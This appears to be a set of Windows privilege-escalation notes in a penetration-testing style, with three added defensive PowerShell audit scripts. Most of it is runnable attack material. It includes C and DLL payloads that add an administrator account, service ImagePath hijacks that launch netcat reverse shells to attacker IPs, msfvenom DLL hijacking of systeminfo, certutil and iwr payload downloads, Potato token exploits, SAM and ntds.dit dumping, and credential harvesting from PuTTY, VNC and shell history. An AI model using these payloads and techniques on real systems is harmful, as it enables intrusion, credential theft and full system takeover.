(Get-PSReadlineOption).HistorySavePath
ls C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
#loop over every user's history file
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
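As an added example (not part of the original notes), a PowerShell audit that walks every user's ConsoleHost_history.txt and reports the lines that look like they carry a credential, so they can be reviewed and purged; the pattern list is an assumption and will need tuning for your environment.

```powershell
# Added example: audit every user's PSReadLine history for lines that look like they
# carry a credential, so they can be reviewed and purged. Patterns are assumptions.
$CredentialPatterns = @(
    '(?i)-Password\s+\S+',                 # -Password <value>
    '(?i)ConvertTo-SecureString\s+["'']',  # inline plaintext secure string
    '(?i)\bnet\s+user\s+\S+\s+\S+\s+/add', # net user <name> <pass> /add
    '(?i)/user:\S+\s+\S+',                 # runas or net use followed by a password
    '(?i)\bcmdkey\b.*/pass',               # stored credentials
    '(?i)-U\s+\S+%\S+'                     # user%password style (winexe, smbclient)
)

function Get-HistoryCredentialHits {
    param(
        [string]$UsersRoot = 'C:\Users',
        [string[]]$Patterns = $CredentialPatterns
    )
    $relative = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    foreach ($userDir in Get-ChildItem -Path $UsersRoot -Directory -ErrorAction SilentlyContinue) {
        $history = Join-Path $userDir.FullName $relative
        if (-not (Test-Path -LiteralPath $history)) { continue }
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $history -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($pattern in $Patterns) {
                if ($line -match $pattern) {
                    [pscustomobject]@{
                        User    = $userDir.Name
                        Line    = $lineNo
                        Pattern = $pattern
                        # Truncate so the full secret is not echoed into the report
                        Text    = $line.Substring(0, [Math]::Min(40, $line.Length)) + '...'
                    }
                    break   # one finding per line is enough
                }
            }
        }
    }
}

Get-HistoryCredentialHits | Format-Table User, Line, Pattern, Text -AutoSize
```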
Get-Service
wmic service get DisplayName, State, StartMode
Get-WmiObject -Class Win32_Service
cmd.exe /c sc queryex type= service state= all
enumerate the executables run by scheduled tasks
schtasks /query /fo LIST /v | Select-String -Pattern "\.exe"
enumerate enabled local users
Get-LocalUser
Name               Enabled Description
----               ------- -----------
Administrator      False   Built-in account for administering the computer/domain
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
nelly              True
offsec             True
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...
...
#Check these files: they may contain the administrator password in plain text or base64 encoding
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\system32\sysprep.inf
C:\xampp\tomcat\conf\tomcat-users.xml
#SAM and SYSTEM hive copies in backups
C:\Windows\System32\config
C:\Windows\System32\config\RegBack
C:\Windows\RegBack
The XAMPP passwords.txt file contains the default passwords for MySQL, WebDAV, FileZilla FTP, ...
C:\xampp> type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
wmic service get name,displayname,pathname,startmode
determine our permissions on the service binary
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(RX)
NT AUTHORITY\Authenticated Users:(RX)
Successfully processed 1 files; Failed processing 0 files
#check which account the service runs as
sc qc test
C program that adds a new user to the local Administrators group
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
same payload as a DLL: the commands run from DllMain when a process loads the DLL
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
int i; // declared before the switch: a declaration directly after a case label does not compile as C
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
#enumerate the service to see which account it runs as
sc qc regsvc
#check the permissions on the service's registry key
C:\test\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
=> if KEY_ALL_ACCESS is granted to a group we are a member of, we can modify the key
set the ImagePath value of the key to the path of our shell executable
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
#search for all services running as LocalSystem
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
$services | where {($_.ObjectName -match 'LocalSystem')}
#also check the Start property to find those that can be started manually (Start = 3)
$services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)}
#now we look for services that we can start ourselves: sc sdshow displays the security descriptor (DACL) of each service, and RP granted to AU (Authenticated Users) means we may start it
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
$services_tmp = $services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)}
$service_names = $services_tmp.pschildname
foreach ($name in $service_names){
    $sddl = sc.exe sdshow $name
    if ($sddl -match "RP[A-Z]*?;;;AU"){
        $name
    }
}
#confirm the start type is 3 (demand start) and the service runs as LocalSystem
sc.exe qc wuauserv
#we can now modify the ImagePath of the service by changing its value to an executable we own
Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\wuauserv -name ImagePath -value "C:\windows\system32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.26 4447"
#start the service
sc.exe start wuauserv
Below are the Start Property values and their description.
In SDDL, the permission to start a service is RP and the permission to stop it is WP.
If we cannot start it ourselves, we need to reboot the machine: in Windows, when the machine restarts, the service will run with the permissions of the last user who logged in.
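Added example, not from the original notes: a PowerShell decoder for the SDDL string that sc.exe sdshow prints, which expands each ACE into a principal and named rights (RP = Start, WP = Stop, DC = ChangeConfig, ...) and then lists the demand-start LocalSystem services whose DACL grants such rights to broad groups. The abbreviation tables are assumptions limited to the codes used here.

```powershell
# Added example: decode the DACL that "sc.exe sdshow <service>" prints and report which
# principals can start (RP), stop (WP) or reconfigure (DC) the service.
# Both lookup tables are assumptions covering only the codes used here.
$ServiceRightNames = @{
    CC='QueryConfig'; DC='ChangeConfig'; LC='QueryStatus'; SW='EnumDependents'
    RP='Start'; WP='Stop'; DT='PauseContinue'; LO='Interrogate'; CR='UserDefinedControl'
    RC='ReadControl'; WD='WriteDac'; WO='WriteOwner'; SD='Delete'
    GA='GenericAll'; GW='GenericWrite'; GX='GenericExecute'; GR='GenericRead'
}
$WellKnownSids = @{
    AU='Authenticated Users'; BU='Users'; WD='Everyone'; IU='Interactive'
    BA='Administrators'; SY='SYSTEM'; LS='Local Service'; NS='Network Service'; SO='Server Operators'
}
# Rights that let a principal start, stop or take over the service
$DangerousRights = '^(Start|Stop|ChangeConfig|WriteDac|WriteOwner|GenericAll|GenericWrite|GenericExecute)$'

function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)][string]$Sddl)
    # Keep only the DACL: strip an O:/G: prefix and a trailing S:(...) SACL section
    $dacl = (($Sddl -split 'S:\(')[0]) -replace '^.*?D:', ''
    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        # ACE string layout: type;flags;rights;object_guid;inherit_guid;sid
        $parts = $m.Groups[1].Value -split ';'
        $rights = $parts[2]
        $names = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) {
            $code = $rights.Substring($i, 2)
            if ($ServiceRightNames[$code]) { $ServiceRightNames[$code] } else { $code }
        }
        $type = if ($parts[0] -eq 'A') { 'Allow' } else { 'Deny' }
        $principal = if ($WellKnownSids[$parts[5]]) { $WellKnownSids[$parts[5]] } else { $parts[5] }
        [pscustomobject]@{ Type = $type; Principal = $principal; Rights = $names }
    }
}

function Find-ServicesControllableByUsers {
    # Demand-start LocalSystem services (the set the notes above select) whose DACL
    # grants dangerous rights to a broad group
    Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\*' -ErrorAction SilentlyContinue |
      Where-Object { $_.ObjectName -eq 'LocalSystem' -and $_.Start -eq 3 } |
      ForEach-Object {
        $name = $_.PSChildName
        $sddl = (sc.exe sdshow $name | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { return }
        ConvertFrom-ServiceSddl -Sddl $sddl |
          Where-Object { $_.Type -eq 'Allow' -and
                         ($_.Principal -in 'Authenticated Users','Users','Everyone','Interactive') -and
                         ($_.Rights -match $DangerousRights) } |
          ForEach-Object { [pscustomobject]@{ Service=$name; Principal=$_.Principal; Rights=($_.Rights -join ',') } }
      }
}

# Worked example on a constructed descriptor: Authenticated Users get Start (RP) but not Stop
ConvertFrom-ServiceSddl -Sddl 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPLOCRRC;;;AU)' |
    Format-Table -AutoSize
```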
AlwaysInstallElevated
The "AlwaysInstallElevated" vulnerability occurs when Windows Installer packages (.msi) have been configured by policy to run with administrative privileges by default.
#check whether the value is set to 0x1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If the value is 0x1, the policy is enabled. Also keep in mind that user credentials may be present in memory: if we are local admin, or a service or process is running with those credentials, sekurlsa::logonpasswords can retrieve them.
Putty
#Check the values saved in each session, user/password could be there
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"
#query the session found with the previous command to display the credentials
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
#dump secrets offline from the exported NTDS.dit and SYSTEM hive
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
C:\Windows write permissions
If we can write into C:\Windows we can hijack DLLs; in this example we use tzres.dll, which systeminfo loads.
Create another reverse shell, outputting the file as tzres.dll, and transfer it to the victim, placing it in the C:\Windows\System32\wbem directory.
hijacking the systeminfo DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
certutil -f -urlcache http://IP C:\windows\System32\wbem\tzres.dll
#trigger the malicious DLL to get a reverse shell
systeminfo
Scheduled Tasks
list all scheduled tasks
PS C:\Users\steve> schtasks /query /fo LIST /v
...
Folder: \Microsoft
HostName: CLIENTWK220
TaskName: \Microsoft\CacheCleanup
Next Run Time: 7/11/2022 2:47:21 AM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/11/2022 2:46:22 AM
Last Result: 0
Author: CLIENTWK220\daveadmin
Task To Run: C:\Users\steve\Pictures\BackendCacheCleanup.exe
Start In: C:\Users\steve\Pictures
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: daveadmin
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 7:37:21 AM
Start Date: 7/4/2022
...
#also check this file
c:\WINDOWS\SchedLgU.Txt
#another powershell command
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
check permissions on the task's executable
PS C:\Users\steve> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
C:\Users\steve\Pictures\BackendCacheCleanup.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CLIENTWK220\steve:(I)(F)
CLIENTWK220\offsec:(I)(F)
PrintSpoofer
.\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
nt authority\system
=> will not work if the Print Spooler service is disabled on the machine
GodPotato.exe -cmd "cmd /c whoami"
#set a new password for Administrator, but note the old admin password: you may need it later to pivot...
GodPotato.exe -cmd "cmd /c net user Administrator Password123"
#execute a reverse shell
GodPotato.exe -cmd "c:\TMP\shell.exe"
5-SweetPotato
SweetPotato.exe -a whoami
.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"
=> will not work if the Print Spooler service is disabled
6-JuicyPotato
x86
.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *
Use -p to choose the program to launch with elevated privileges (be sure to use the full path). Any arguments for the program are passed with -a in quotes, followed by -t * to create the process token.
If it fails
The default CLSID did not work, so we hunt for a new one and pass it with the -c argument:
Automate the search for a CLSID that yields NT AUTHORITY\SYSTEM
create a file named test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
echo %%i !port!
juicypotato.exe -z -l !port! -c %%i >> result.log
set RET=!ERRORLEVEL!
:: echo !RET!
if "!RET!" == "1" set /a port=port+1
)
create a file CLSID.list with the CLSIDs from https://github.com/ohpe/juicy-potato/tree/master/CLSID
run the bat file
then use a CLSID that gives NT AUTHORITY\SYSTEM
SeBackupPrivilege
1-RegSave.exe
.\RegSave.exe -t DC01 -o "C:\Users\svc_backup\Documents" --backup
[+] Exported \\DC01\HKLM\SAM to C:\Users\svc_backup\Documents\3BEF2064-A1DA-422E-B5D8-0086D1FB82E4
[+] Exported \\DC01\HKLM\SYSTEM to C:\Users\svc_backup\Documents\B8519DCB-2E82-4D28-AAD4-CF5428193033
[+] Exported \\DC01\HKLM\SECURITY to C:\Users\svc_backup\Documents\D4818E3E-7A32-4876-B9B7-1B9236317F27
2-SAM via registry
reg save hklm\system system
reg save hklm\sam sam
3-NTDSUtil
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
4-diskshadow
create a diskshadow script and convert it to Windows (CRLF) line endings
$ cat kunal.dsh
set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
#convert the line endings
$ unix2dos kunal.dsh
unix2dos: converting file kunal.dsh to DOS format...
#or do the conversion in PowerShell directly
Get-Content -path kunal.dsh | set-content -path kunal.script -encoding ascii
diskshadow /s kunal.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 10/23/2023 3:11:30 PM
-> set context persistent nowriters
-> add volume c: alias kunal
-> create
Alias kunal for shadow ID {69873b2c-c8cc-47c4-87f6-530b086b0eed} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {825b3882-58fd-45ec-82b4-d41c20790e90} set as environment variable.
Querying all shadow copies with the shadow copy set ID {825b3882-58fd-45ec-82b4-d41c20790e90}
* Shadow copy ID = {69873b2c-c8cc-47c4-87f6-530b086b0eed} %kunal%
- Shadow copy set: {825b3882-58fd-45ec-82b4-d41c20790e90} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 10/23/2023 3:11:30 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %kunal% z:
-> %kunal% = {69873b2c-c8cc-47c4-87f6-530b086b0eed}
The shadow copy was successfully exposed as z:\.
use robocopy in backup mode (/B) to copy ntds.dit out of the exposed shadow copy
robocopy /B Z:\Windows\NTDS . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, October 23, 2023 3:16:12 PM
Source : Z:\Windows\NTDS\
Dest : C:\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 Z:\Windows\NTDS\
New File 16.0 m ntds.dit
...
------------------------------------------------------------------------------
               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00
Speed : 111,107,390 Bytes/sec.
Speed : 6,357.616 MegaBytes/min.
Ended : Monday, October 23, 2023 3:16:12 PM
The copy of ntds.dit is now in the temp directory
PS C:\Temp> dir ntds.dit
Directory: C:\Temp
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         10/23/2023 10:52 AM       16777216 ntds.dit
5-Wbadmin
First you need to set up an SMB server that supports NTFS.
1-configure a samba server with authentication
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
interfaces = tun0
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
2-Create a new user that matches the user in the force user parameter
SeRestorePrivilege
It is worth noting that having SeRestorePrivilege enabled can present an opportunity in penetration testing or ethical hacking scenarios. This privilege is designed to permit a user to restore files and directories and, more crucially, it enables the bypass of file permissions and ACL checks. This can be utilized to substitute system files with other files, a common technique employed for privilege escalation or retaining access.
By replacing utilman.exe with cmd.exe, we can access the Command Prompt from the Windows login screen without needing to log in.
This means that if we reboot or logout from the machine and press Windows Key + U at the login screen, instead of opening the Utility Manager, the system will launch the Command Prompt with system privileges.
Now, after connecting over RDP with rdesktop, we can invoke utilman.exe with Windows + U at the login screen.
SeLoadDriverPrivilege
First we need to enable SeLoadDriverPrivilege, which is disabled by default.
Upload the exploit to the target machine, then execute the payload:
.\ExploitCapcom.exe EXPLOIT shell.exe
You will get a reverse shell as SYSTEM.
SeManageVolumePrivilege
.\SeManageVolumeExploit.exe
#confirm we can write into C:\Windows\System32
echo "test" > C:\Windows\System32\test.txt
#so we can hijack any DLL loaded from there, e.g. tzres.dll as above
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
copy tzres.dll C:\Windows\System32\wbem
systeminfo
SeTakeOwnershipPrivilege
enable it
PS C:\htb> Import-Module .\Enable-Privilege.ps1
PS C:\htb> .\EnableAllTokenPrivs.ps1
PS C:\htb> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                              State
============================= ======================================== =======
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Enabled
Let's check out our target file to gather a bit more information about it.
Now we can use the takeown Windows binary to change ownership of the file.
PS C:\htb> takeown /f 'C:\Department Shares\Private\IT\cred.txt'
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student".
We can confirm ownership using the same command as before. We now see that our user account is the file owner.
#generate a dll with msfvenom
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
#start an SMB server on our machine so the DLL is loaded remotely, which avoids triggering AV on disk
sudo impacket-smbserver share ./
# dnscmd utility can be used to set the remote DLL path into the Windows Registry
cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.9\share\da.dll
#restart dns service
sc.exe stop dns
sc.exe start dns
#login as administrator
sudo psexec.py megabank.local/administrator@10.10.10.169
Local Service or Network Service Group
Normally, since we now have access to the LOCAL SERVICE account, we should theoretically have the SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege privileges. These would grant us the ability to coerce authentication to SYSTEM via a malicious named pipe. If we do not have these privileges, we can sometimes restore them with the FullPowers.exe tool. The key observation by its author: when a scheduled task is created, the new process created by the Task Scheduler service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulation, you can spawn a new process with all the missing privileges.
Checking if we have local service privileges
C:\xampp\htdocs>whoami
nt authority\local service
using FullPowers.exe
#download file
iwr http://10.8.0.210/FullPowers.exe -outfile FullPowers.exe
#usage 1: spawn a new cmd as localsystem user
.\FullPowers.exe
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
#usage 2
.\FullPowers.exe -c "C:\temp\nc64.exe 10.8.0.210 443 -e cmd" -z
[+] Started dummy thread with id 3704
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
It is a very highly privileged group that can log in locally to servers, including Domain Controllers. Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.
git clone https://github.com/bitsadmin/wesng --depth 1
#i used this one
python /opt/wesng/wes.py ./systeminfo.txt -i 'Elevation of Privilege' --exploits-only
The registry file found contains a Password attribute, with the corresponding value consisting of hexadecimal characters.
#suppose this is the password we found
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
#now decrypt it with the RFB cipher from Metasploit (the key is the fixed VNC DES key)
msfconsole
msf5 > irb
key = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), key
Decrypting PowerShell Credentials
If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml. The example below assumes the former.
#usage: "mklink /J [directory we want to link should not exist] [destination]"
cmd /c "mklink /J C:\Users\upload C:\xampp\htdocs"
Spawn Shell as Administrator
Invoke-RunasCs -Username Administrator -Password trustno1 -Command ./shell.exe
#PsExec
.\PsExec64.exe -accepteula -i -s "c:\shell.exe"
#winexe from Linux
winexe -U 'admin%Password123' //192.168.45.16 cmd.exe
#spawn shell as system
winexe -U 'admin%Password123' --system //192.168.45.16 cmd.exe
Insecure GUI Apps
check which user the running process belongs to
tasklist /V | findstr mspaint.exe
abuse the app's GUI (e.g. its file open dialog) to launch cmd
open cmd here
Startup Apps
Each user can define apps that start when they log in by placing shortcuts in a specific directory. Windows also has a startup directory for apps that should start for all users: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\. If we can create a file in this directory, we can drop our reverse shell executable there and escalate privileges when an admin logs in.
use accesschk to check permissions over this directory
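Added example that covers both the scheduled-task check earlier (writable task binaries such as BackendCacheCleanup.exe, which the notes verify with icacls) and this Startup folder check; it is not code from the original notes. The PowerShell audit resolves each enabled task's executable and checks it, its directory and the all-users Startup folder for ACEs granting write-class rights to Users, Authenticated Users, Everyone or INTERACTIVE. The principal and rights lists are assumptions.

```powershell
# Added example: audit scheduled tasks (and the all-users Startup folder) for executables
# or directories that broad groups can modify. A task that runs as another account from
# such a path is a privilege escalation path. Principal/rights lists are assumptions.
$WritableRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'
$BroadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE')

function Get-WeakWriteAce {
    # Returns the Allow ACEs on $Path that grant write-class rights to a broad principal
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WritableRights) -ne 0) {
            [pscustomobject]@{ Path = $Path; Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Resolve-TaskExecutable {
    # Expands %SystemRoot%-style variables and strips quotes/arguments from a task action
    param([Parameter(Mandatory)][string]$Execute)
    $exe = [Environment]::ExpandEnvironmentVariables($Execute.Trim())
    if ($exe.StartsWith('"')) {
        $end = $exe.IndexOf('"', 1)
        if ($end -gt 1) { $exe = $exe.Substring(1, $end - 1) }
    } elseif (-not (Test-Path -LiteralPath $exe) -and $exe.Contains(' ')) {
        $exe = $exe.Split(' ')[0]   # unquoted "C:\tool.exe arg" form
    }
    return $exe
}

function Find-WritableTaskBinaries {
    $tasks = Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.State -ne 'Disabled' }
    foreach ($task in $tasks) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = Resolve-TaskExecutable -Execute $action.Execute
            if (-not (Test-Path -LiteralPath $exe)) { continue }
            # Check the binary itself and its directory (a writable directory allows replacement)
            foreach ($p in @($exe, (Split-Path -Parent $exe))) {
                Get-WeakWriteAce -Path $p | ForEach-Object {
                    [pscustomobject]@{ Task = $task.TaskPath + $task.TaskName; RunAs = $task.Principal.UserId
                                       Path = $_.Path; Principal = $_.Principal; Rights = $_.Rights }
                }
            }
        }
    }
    # Anything dropped here runs at the next logon of every user, including admins
    Get-WeakWriteAce -Path "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
}

Find-WritableTaskBinaries | Format-Table -AutoSize
```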